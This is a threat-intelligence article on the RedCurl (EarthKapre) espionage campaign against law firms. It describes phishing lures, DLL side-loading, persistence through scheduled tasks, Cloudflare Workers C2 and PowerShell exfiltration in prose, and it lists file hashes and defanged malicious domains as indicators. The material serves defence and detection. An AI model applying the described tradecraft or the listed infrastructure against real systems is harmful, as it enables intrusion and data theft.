A highly sophisticated cyber espionage group known as EarthKapre, also referred to as RedCurl, has been identified targeting private-sector organizations, particularly those in the Law Firms & Legal Services industry.
The eSentire Threat Response Unit (TRU) uncovered the group’s recent activities in January 2025, revealing a complex attack chain designed for corporate espionage.
Technical Analysis: A Deep Dive into the Malware
The initial point of entry involves carefully crafted phishing emails disguised as job applications from Indeed. These emails contain PDF attachments with links that lead unsuspecting victims to download ZIP archives.
Within these archives lies a mountable ISO (IMG) file. Once mounted, the victim sees a file named “CV Applicant *.scr,” which is actually a legitimate, signed Adobe executable (“ADNotificationManager.exe”).
Opening this file triggers a technique called “DLL side-loading,” where the EarthKapre loader (“netutils.dll”) is executed. This multi-stage attack is designed to evade traditional security measures.
The TRU team’s analysis reveals a sophisticated approach involving multiple stages of encryption and obfuscation.
Stage 1 (Simple Downloader): The primary purpose is to download and execute the next stage. It employs a string decryption function utilizing various APIs in bcrypt.dll to generate a SHA256 hash, which then serves as an AES key.
This key decrypts strings, including a C2 URL (sm.vbigdatasolutions.workers[.]dev) and a user agent. To further deceive the user, the malware opens a legitimate-looking “https://secure.indeed.com/auth” page in the victim’s browser.
Persistence: The malware establishes persistence by creating a scheduled task via the COM interface (taskschd.dll). This task is designed to execute the next stage using the LOLBin Program Compatibility Assistant (pcalua.exe) and rundll32.exe.
C2 Communication: The malware communicates with its command-and-control (C2) server to acquire the second-stage payload. The payload is encrypted and requires a specific XOR key for decryption.
Stage 2: This stage continues to use the string decryption techniques from the first stage but derives the AES decryption key differently. It checks for internet availability by attempting to connect to “www.msn.com”.
It gathers information of the compromised computer such as username, computer name, and directory paths for Program Files, Desktop, and Local AppData.
The collected data is encrypted and sent to the C2 server. It also checks for debuggers. If none are found, a third stage payload is downloaded and executed.
Reconnaissance and Data Exfiltration
Upon successful execution of the final stage, EarthKapre initiates a series of commands to gather system information, including user account details, system configurations, disk information, and installed antivirus products.
It leverages tools like SysInternals AD Explorer to extract data from Active Directory. The collected data is then archived using 7-Zip with password protection and exfiltrated to the cloud storage provider “Tab Digital” via PowerShell PUT requests.
EarthKapre also utilizes Cloudflare Workers for its C2 infrastructure. While this provides a serverless execution environment, it also comes with limitations.
Security researchers at eSentire discovered that they could exploit the limitations of Cloudflare Workers’ free tier (100,000 requests per day) to disrupt the threat actor’s operations.
eSentire recommends organizations to educate their employees on the dangers of phishing emails, especially those disguised as job applications. It is crucial to verify the legitimacy of email attachments and links before opening them.
Additionally, organizations should implement robust endpoint detection and response (EDR) solutions to detect and prevent sophisticated attacks like those employed by EarthKapre.
Are you from SOC/DFIR Team? - Join 500,000+ Researchers to Analyze Cyber Threats with ANY.RUN Sandbox - Try for Free
Indicator of Compromise
File:
c6ef0416f7008882317696e66b93885170f5999968bc36d9165d313fa57ef041 – CV Applicant 4890-17173.img
868d382f98a4465b239f9e5b6dc91a46ada7f334df26af9e780dd7fa74dc4e3c – netutils.dll (EarthKapre Simple Downloader)
e6715e140ecab861235ae01c84345f7453847a9ba330512a37137bdf9e908edb – encrypted_payload.bin (Encrypted second stage payload)
bd5099e03d81613802d6ef4c2743195cb6e31d37b35a71011c924e66c40e6635 – EarthKapre decrypted second stage
ff3706e94d9b769f78e4271928382426cb034b11c5a0f6a8ffea35726cc03692 – 7za.exe (7-Zip)
e451287843b3927c6046eaabd3e22b929bc1f445eec23a73b1398b115d02e4fb – ADExplorer64.exe (Sysinternals AD Explorer)
Domain:
cvsend.resumeexpert[.]cloud – Dropper domain
live[.]itsmartuniverse[.]workers[.]dev – RedCurl C2
datascience.iotconnectivity.workers[.]dev – RedCurl C2
sm.vbigdatasolutions.workers[.]dev – RedCurl C2
community.rmobileappdevelopment.workers[.]dev – RedCurl C2
mia.nl.tab[.]digital – Exfil domain
URL: https://cvsend.resumeexpert[.]cloud/id/45bc4c3c-e212-43ab-a5d3-1a668c2df00e/kAal108 – Dropper URL